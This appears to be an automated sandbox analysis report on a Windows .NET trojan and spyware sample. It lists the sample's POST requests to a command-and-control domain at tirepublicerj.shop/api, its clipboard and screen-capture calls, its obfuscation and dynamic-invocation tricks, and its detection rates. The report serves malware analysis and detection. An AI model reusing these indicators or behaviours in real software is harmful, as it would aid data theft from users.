DNS traffic detected: DNS query: tirepublicerj.shop

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: tirepublicerj.shop

Source: file.exe	String found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
Source: file.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: file.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: file.exe	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: file.exe	String found in binary or memory: http://crl.entrust.net/ts1ca.crl0
Source: file.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: file.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: file.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: file.exe	String found in binary or memory: http://ocsp.digicert.com0
Source: file.exe	String found in binary or memory: http://ocsp.digicert.com0A
Source: file.exe	String found in binary or memory: http://ocsp.entrust.net02
Source: file.exe	String found in binary or memory: http://ocsp.entrust.net03
Source: Amcache.hve.5.dr	String found in binary or memory: http://upx.sf.net
Source: file.exe	String found in binary or memory: http://www.digicert.com/CPS0
Source: file.exe	String found in binary or memory: http://www.entrust.net/rpa03
Source: file.exe, 00000002.00000002.1879224589.00000000038CF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.1878759379.000000000120B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.1878661592.00000000011BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tirepublicerj.shop/
Source: file.exe, 00000002.00000002.1878759379.000000000120B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tirepublicerj.shop/)
Source: file.exe, 00000002.00000002.1878759379.000000000120B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tirepublicerj.shop/9
Source: file.exe, 00000002.00000002.1878759379.000000000120B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tirepublicerj.shop/api
Source: file.exe, 00000002.00000002.1878759379.000000000120B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tirepublicerj.shop/api8
Source: file.exe, 00000002.00000002.1878759379.000000000120B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tirepublicerj.shop/ndows
Source: file.exe, 00000002.00000002.1878711714.00000000011D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tirepublicerj.shop:443/apiCLSID
Source: file.exe	String found in binary or memory: https://www.entrust.net/rpa0

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49746 version: TLS 1.2

Source: C:\Users\user\Desktop\file.exe

Code function: 2_2_00437A60 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

2_2_00437A60

Source: C:\Users\user\Desktop\file.exe

Code function: 2_2_00437A60 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

2_2_00437A60

Source: C:\Users\user\Desktop\file.exe

Code function: 2_2_00437C10 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,

2_2_00437C10

Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0043D0D0	2_2_0043D0D0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0040E16E	2_2_0040E16E
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00408A60	2_2_00408A60
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_004442E0	2_2_004442E0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00421B30	2_2_00421B30
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00418BA2	2_2_00418BA2
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00444C20	2_2_00444C20
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0043CE90	2_2_0043CE90
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00428750	2_2_00428750
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00425713	2_2_00425713
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0042F716	2_2_0042F716
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00437850	2_2_00437850
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0041906A	2_2_0041906A
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00426010	2_2_00426010
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_004438E0	2_2_004438E0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_004180F0	2_2_004180F0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_004438F9	2_2_004438F9
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_004438FB	2_2_004438FB
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00427885	2_2_00427885
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0041D8B0	2_2_0041D8B0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00406950	2_2_00406950
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00444950	2_2_00444950
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0043210B	2_2_0043210B
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00403910	2_2_00403910
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00429917	2_2_00429917
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00406120	2_2_00406120
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0040B92C	2_2_0040B92C
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0042F1C1	2_2_0042F1C1
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_004239EB	2_2_004239EB
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00421180	2_2_00421180
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0041618C	2_2_0041618C
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0043099F	2_2_0043099F
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0041F9A0	2_2_0041F9A0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0041D1B0	2_2_0041D1B0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0042E9B0	2_2_0042E9B0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0041BA52	2_2_0041BA52
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0043025E	2_2_0043025E
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0042621B	2_2_0042621B
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0042BA20	2_2_0042BA20
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00417222	2_2_00417222
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00443A30	2_2_00443A30
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00443AC0	2_2_00443AC0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_004302CD	2_2_004302CD
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0040F2D0	2_2_0040F2D0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0040B280	2_2_0040B280
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_004352B0	2_2_004352B0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00402B40	2_2_00402B40
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00443B60	2_2_00443B60
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00409B70	2_2_00409B70
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00422370	2_2_00422370
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00429B7B	2_2_00429B7B
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0042FB7D	2_2_0042FB7D
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00405B00	2_2_00405B00
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00440B00	2_2_00440B00
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00428B10	2_2_00428B10
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00419B30	2_2_00419B30
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00411BDE	2_2_00411BDE
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_004123EC	2_2_004123EC
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00428C62	2_2_00428C62
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0043C460	2_2_0043C460
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0043B410	2_2_0043B410
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00441C26	2_2_00441C26
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_004064C0	2_2_004064C0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0042F4E1	2_2_0042F4E1
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_004324EE	2_2_004324EE
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0041D4A0	2_2_0041D4A0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00408D10	2_2_00408D10
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0043E520	2_2_0043E520
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00442DCA	2_2_00442DCA
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00415DD8	2_2_00415DD8
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00425DA0	2_2_00425DA0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_004085B0	2_2_004085B0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00447648	2_2_00447648
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00409660	2_2_00409660
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00404E20	2_2_00404E20
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0043C6C0	2_2_0043C6C0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0043E6E0	2_2_0043E6E0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_004186E5	2_2_004186E5
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00444680	2_2_00444680
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0041DE90	2_2_0041DE90
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0043DF60	2_2_0043DF60
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00429F7C	2_2_00429F7C
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00433707	2_2_00433707
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00402F10	2_2_00402F10
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00427FC0	2_2_00427FC0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_004437D0	2_2_004437D0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00433FDF	2_2_00433FDF
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_004127E0	2_2_004127E0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0042A7F0	2_2_0042A7F0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00434FF0	2_2_00434FF0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0042AF92	2_2_0042AF92

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 00408280 appears 47 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 00414C20 appears 145 times

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6496 -s 160

Source: file.exe

Static PE information: invalid certificate

Source: file.exe, 00000000.00000000.1771192716.0000000000102000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameHandler.exe0 vs file.exe
Source: file.exe, 00000000.00000002.1994621787.00000000034F9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameHandler.exe0 vs file.exe
Source: file.exe, 00000000.00000002.1994165417.000000000084E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs file.exe
Source: file.exe	Binary or memory string: OriginalFilenameHandler.exe0 vs file.exe

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: file.exe

Static PE information: Section: .BSS ZLIB complexity 1.0003366411102483

Source: file.exe, vq3eeWeR9wjKffmTlE.cs	Cryptographic APIs: 'CreateDecryptor'
Source: file.exe, vq3eeWeR9wjKffmTlE.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.file.exe.34f9550.0.raw.unpack, vq3eeWeR9wjKffmTlE.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.file.exe.34f9550.0.raw.unpack, vq3eeWeR9wjKffmTlE.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@5/5@1/1

Source: C:\Users\user\Desktop\file.exe

Code function: 2_2_0043D0D0 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,

2_2_0043D0D0

Source: C:\Users\user\Desktop\file.exe	Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6496
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6520:120:WilError_03

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\5676b671-4a64-45a5-ba8b-7a402d12f1bb

Jump to behavior

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: file.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe	ReversingLabs: Detection: 39%
Source: file.exe	Virustotal: Detection: 43%

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6496 -s 160
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: file.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: System.Windows.Forms.pdb source: WEREBF6.tmp.dmp.5.dr
Source:	Binary string: mscorlib.pdb source: WEREBF6.tmp.dmp.5.dr
Source:	Binary string: System.ni.pdbRSDS source: WEREBF6.tmp.dmp.5.dr
Source:	Binary string: mscorlib.ni.pdb source: WEREBF6.tmp.dmp.5.dr
Source:	Binary string: System.pdb) source: WEREBF6.tmp.dmp.5.dr
Source:	Binary string: Handler.pdb source: file.exe, WEREBF6.tmp.dmp.5.dr
Source:	Binary string: mscorlib.ni.pdbRSDS source: WEREBF6.tmp.dmp.5.dr
Source:	Binary string: Handler.pdbt-^q source: WEREBF6.tmp.dmp.5.dr
Source:	Binary string: System.ni.pdb source: WEREBF6.tmp.dmp.5.dr
Source:	Binary string: System.pdb source: WEREBF6.tmp.dmp.5.dr

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: file.exe, vq3eeWeR9wjKffmTlE.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 0.2.file.exe.34f9550.0.raw.unpack, vq3eeWeR9wjKffmTlE.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

Source: file.exe

Static PE information: 0xB98C4C41 [Thu Aug 23 20:32:01 2068 UTC]

Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_004499A1 push esp; ret	2_2_004499A2
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0044AAD0 push ecx; retn 0041h	2_2_0044AAD5
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00447648 push esi; ret	2_2_00447979

Source: file.exe, vCg2VT5p7jXNk50llbq.cs	High entropy of concatenated method names: 'OkE5tnHZaj', 'quL5gsUNKs', 'eLK5c84hpa', 'gXo58eGg5j', 'GW55mMYBwj', 'dbk5nDS4d7', 'YJd5ONDt15', 'tsG5SJZu72', 'FvJ53MSI6H', 'NUD52Skowi'
Source: file.exe, vq3eeWeR9wjKffmTlE.cs	High entropy of concatenated method names: 'RmVqL4ujd4', 'nW4lBacjpc', 'IAr5ATjHqU', 'UIx5yCnXZI', 'oQd5WcYeRd', 'qXl50hRD5T', 'oR65zJ81n2', 'jQiB7OERf', 'LicZSc09T', 'a2jGlQURl'
Source: 0.2.file.exe.34f9550.0.raw.unpack, vCg2VT5p7jXNk50llbq.cs	High entropy of concatenated method names: 'OkE5tnHZaj', 'quL5gsUNKs', 'eLK5c84hpa', 'gXo58eGg5j', 'GW55mMYBwj', 'dbk5nDS4d7', 'YJd5ONDt15', 'tsG5SJZu72', 'FvJ53MSI6H', 'NUD52Skowi'
Source: 0.2.file.exe.34f9550.0.raw.unpack, vq3eeWeR9wjKffmTlE.cs	High entropy of concatenated method names: 'RmVqL4ujd4', 'nW4lBacjpc', 'IAr5ATjHqU', 'UIx5yCnXZI', 'oQd5WcYeRd', 'qXl50hRD5T', 'oR65zJ81n2', 'jQiB7OERf', 'LicZSc09T', 'a2jGlQURl'

Source: C:\Users\user\Desktop\file.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
